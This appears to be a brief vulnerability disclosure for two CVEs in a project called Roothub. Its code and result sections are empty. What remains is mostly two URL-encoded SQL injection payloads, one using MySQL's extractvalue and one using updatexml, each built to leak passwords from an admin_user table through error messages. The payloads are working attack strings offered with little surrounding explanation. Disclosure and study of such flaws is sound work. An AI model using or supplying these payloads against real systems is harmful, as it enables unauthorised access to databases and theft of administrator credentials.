Roothub_vulns
Vulnerable codes:
Bug 1 / CVE-2022-27473:
Bug 2 / CVE-2022-27472:
Payload: we can use "extractvalue" or "updatexml" function in mysql to trigger the exception and finish the exploitation of this SQLi vulnerability.
-
"extractvalue": a%25'%20union%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cextractvalue('1'%2Cconcat('~'%2C(select%20password%20from%20admin_user)))%20from%20admin_user--%20
-
"updatexml": xx%25%27%20and%20updatexml(1%2Cconcat(0x7e%2C(select%20password%20from%20admin_user)%2C0x7e)%2C3)--%20
Result:



